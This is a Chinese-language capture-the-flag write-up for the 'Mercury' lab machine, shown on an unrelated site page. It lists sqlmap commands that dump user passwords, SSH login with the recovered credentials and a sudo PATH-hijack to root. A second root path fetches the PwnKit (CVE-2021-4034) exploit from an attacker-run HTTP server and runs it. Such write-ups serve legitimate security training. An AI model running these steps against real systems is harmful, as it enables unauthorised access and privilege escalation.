当前位置：首页 > news >正文

网站建设报价单安顺做网站

news 2025/11/21 0:40:04

网站建设报价单,安顺做网站,亚马逊平台的运营模式,网上如何建网站卖量具文章妙语不与伪君子争名#xff0c;不与真小人争利#xff0c;不与执拗人争理#xff0c;不与匹夫争勇#xff0c;不与酸儒争才。不与蠢人施恩一、信息收集主机探测端口探测探测主机详细版本信息 8080开了http服务目录扫描 robots.txt目录下什么也没有二#xff0… 文章妙语不与伪君子争名不与真小人争利不与执拗人争理不与匹夫争勇不与酸儒争才。不与蠢人施恩一、信息收集主机探测端口探测探测主机详细版本信息 8080开了http服务目录扫描 robots.txt目录下什么也没有二漏洞发现顺便输入一个错误的参数报错出重要目录mercuryfacts/ 像是sql漏洞sqlmap跑一下果然有sql漏洞这里就不演示了因为没有过滤直接一把梭 python sqlmap.py -u http://192.168.1.41:8080/mercuryfacts/1 --batch -D mercury -T users -C username,password --dump 三ssh连接 webmastermercuryisthesizeof0.056Earths 五提权 1.第一种 webmastermercury:/home$ ll total 20 drwxr-xr-x 5 root root 4096 Aug 28 2020 ./ drwxr-xr-x 19 root root 4096 Sep 1 2020 ../ drwx------ 3 linuxmaster linuxmaster 4096 Jan 10 12:46 linuxmaster/ drwx------ 3 mercury mercury 4096 Sep 1 2020 mercury/ drwx------ 4 webmaster webmaster 4096 Sep 2 2020 webmaster/ webmastermercury:/home$ cd /web -bash: cd: /web: No such file or directory webmastermercury:/home$ cd webmaster/ webmastermercury:~$ ll total 36 drwx------ 4 webmaster webmaster 4096 Sep 2 2020 ./ drwxr-xr-x 5 root root 4096 Aug 28 2020 ../ lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 2020 .bash_history - /dev/null -rw-r--r-- 1 webmaster webmaster 220 Aug 27 2020 .bash_logout -rw-r--r-- 1 webmaster webmaster 3771 Aug 27 2020 .bashrc drwx------ 2 webmaster webmaster 4096 Aug 27 2020 .cache/ drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 mercury_proj/ -rw-r--r-- 1 webmaster webmaster 807 Aug 27 2020 .profile -rw-rw-r-- 1 webmaster webmaster 75 Sep 1 2020 .selected_editor -rw------- 1 webmaster webmaster 45 Sep 1 2020 user_flag.txt webmastermercury:~$ cat user_flag.txt [user_flag_8339915c9a454657bd60ee58776f4ccd] webmastermercury:~$ cd mercury_proj/ webmastermercury:~/mercury_proj$ ll total 28 drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 ./ drwx------ 4 webmaster webmaster 4096 Sep 2 2020 ../ -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3 -rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py* drwxrwxr-x 6 webmaster webmaster 4096 Sep 1 2020 mercury_facts/ drwxrwxr-x 4 webmaster webmaster 4096 Aug 28 2020 mercury_index/ drwxrwxr-x 3 webmaster webmaster 4096 Aug 28 2020 mercury_proj/ -rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt webmastermercury:~/mercury_proj$ cat notes.txt Project accounts (both restricted): webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg在notes.txt中发现了linuxmaster的密码要经过base64解密 webmastermercury:~/mercury_proj$ echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg | base64 -d mercurymeandiameteris4880kmsu 到linuxmaster中 linuxmastermercury:/tmp$ sudo -l [sudo] password for linuxmaster: Matching Defaults entries for linuxmaster on mercury:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser linuxmaster may run the following commands on mercury:(root : root) SETENV: /usr/bin/check_syslog.sh linuxmastermercury:/tmp$ cat /usr/bin/check_syslog.sh #!/bin/bash tail -n 10 /var/log/sysloglinuxmastermercury:/tmp$ echo /bin/bash shell 将/bin/bash写到shell中linuxmastermercury:/tmp$ export PATH.:$PATH 将当前目录放到PATH环境中linuxmastermercury:/tmp$ chmod 777 shell 加可执行权限linuxmastermercury:/tmp$ sudo --preserve-envPATH /usr/bin/check_syslog.sh 当你使用 sudo 执行命令时通常会创建一个新的、较为干净的环境以防止潜在的安全问题。--preserve-env 允许你指定要在新环境中保留的环境变量其中 PATH 是一个常见的环境变量rootmercury:/tmp# id uid0(root) gid0(root) groups0(root)rootmercury:/tmp# cd /rootrootmercury:~# cat root_flag.txt/## (((/(*(/(((((( ((#(#(###((##//(((/(/(((*((// /#(((#((((((/(/,*/(((///(/*/*/# *((####((///*//(///*(/*//((/(((//**/(( /(/(((##/*((//(#((((((/(///(((((///(* /(//((((#(((((*///*/(/(/(((/(((/*/*(/// //**/(/(#(#(##((/(((((/(**//((//((*/# (//(/((((((#((((#*/((///((///((//(/(/(*(/ ((//((((/((((#(/(/((/(/(((((#((((((/(/((/ (((/(((/##((#((/*///((/((/((##((/(/(/((((((/* (((/(##/#(((##((/((((((/(##(/##(#((/((((#((*% (///(#(((((#(#(((((#(//((#((###((/(((((/(// (/*/(##(/(###(((#((((/((####/((((///((((/ %//((((#############((((/((/(/(*/((((( %#(((############(##((#((*//(/(*// /(#(####(###/((((((#(///((//( (((###((#(#(((/((///* %#(#% Congratulations on completing Mercury!!! If you have any feedback please contact me at SirFlashprotonmail.com [root_flag_69426d9fda579afbffd9c2d47ca31d90]2.第二种内核提权通过在kali中下载CVE-2021-4034提权 wget https://github.com/berdav/CVE-2021-4034.git ┌──(root㉿kali)-[~/kali/CVE] └─# ll 总计 64 drwxr-xr-x 5 root root 4096 1月 4日 02:14 CVE-2021-4034 -rw-r--r-- 1 root root 57922 1月 4日 04:25 CVE-2021-4034.tar.gz┌──(root㉿kali)-[~/kali/CVE] └─# python -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...1.mkdir123 2.cd 123 3.wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz 4.tar -xvf CVE-2021-4034.tar.gz # 一定要先在kali中压缩然后再靶机上下载不然会有问题 5.cd CVE-2021-4034/ 6.make 7../cve-2021-4034 下面的不用看按上述步骤来 linuxmastermercury:/tmp/CVE-2021-4034$ mkdir 123 linuxmastermercury:/tmp/CVE-2021-4034$ cd 123/ linuxmastermercury:/tmp/CVE-2021-4034/123$ wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz --2024-01-10 14:11:40-- http://192.168.1.48:8888/CVE-2021-4034.tar.gz Connecting to 192.168.1.48:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 57922 (57K) [application/gzip] Saving to: ‘CVE-2021-4034.tar.gz’ CVE-2021-4034.tar.gz 100%[] 56.56K --.-KB/s in 0.001s 2024-01-10 14:11:40 (92.1 MB/s) - ‘CVE-2021-4034.tar.gz’ saved [57922/57922] linuxmastermercury:/tmp/CVE-2021-4034/123$ tar -xvf CVE-2021-4034.tar.gz linuxmastermercury:/tmp/CVE-2021-4034/123$ ll total 72 drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ./ drwxr-xr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../ drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 4 07:14 CVE-2021-4034/ -rw-rw-r-- 1 linuxmaster linuxmaster 57922 Jan 4 09:25 CVE-2021-4034.tar.gz linuxmastermercury:/tmp/CVE-2021-4034/123$ cd CVE-2021-4034/ linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll total 68 drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 4 07:14 ./ drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../ -rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c -rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh* drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/ -rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH./ drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/ -rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore -rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE -rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile -rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c -rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so* -rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ make cc -Wall cve-2021-4034.c -o cve-2021-4034 mkdir -p GCONV_PATH. cp -f /usr/bin/true GCONV_PATH./pwnkit.so:. linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll total 88 drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 10 14:12 ./ drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../ -rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12 cve-2021-4034* -rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c -rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh* drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/ -rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH./ drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/ -rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore -rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE -rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile -rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c -rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so* -rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ chmod x cve-2021-4034 linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ls cve-2021-4034 cve-2021-4034.c cve-2021-4034.sh dry-run gconv-modules GCONV_PATH. LICENSE Makefile pwnkit.c pwnkit.so README.md linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll total 88 drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 10 14:12 ./ drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../ -rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12 cve-2021-4034* -rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c -rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh* drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/ -rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH./ drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/ -rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore -rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE -rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile -rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c -rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so* -rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md linuxmastermercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ./cve-2021-4034 # id uid0(root) gid0(root) groups0(root),1002(linuxmaster),1003(viewsyslog) # cd root /bin/sh: 2: cd: cant cd to root # cd /root # ll /bin/sh: 4: ll: not found # ls root_flag.txt # at roo # cat root_flag.txt /## (((/(*(/(((((( ((#(#(###((##//(((/(/(((*((// /#(((#((((((/(/,*/(((///(/*/*/# *((####((///*//(///*(/*//((/(((//**/(( /(/(((##/*((//(#((((((/(///(((((///(* /(//((((#(((((*///*/(/(/(((/(((/*/*(/// //**/(/(#(#(##((/(((((/(**//((//((*/# (//(/((((((#((((#*/((///((///((//(/(/(*(/ ((//((((/((((#(/(/((/(/(((((#((((((/(/((/ (((/(((/##((#((/*///((/((/((##((/(/(/((((((/* (((/(##/#(((##((/((((((/(##(/##(#((/((((#((*% (///(#(((((#(#(((((#(//((#((###((/(((((/(// (/*/(##(/(###(((#((((/((####/((((///((((/ %//((((#############((((/((/(/(*/((((( %#(((############(##((#((*//(/(*// /(#(####(###/((((((#(///((//( (((###((#(#(((/((///* %#(#% Congratulations on completing Mercury!!! If you have any feedback please contact me at SirFlashprotonmail.com [root_flag_69426d9fda579afbffd9c2d47ca31d90]

查看全文

http://www.zqtcl.cn/news/305331/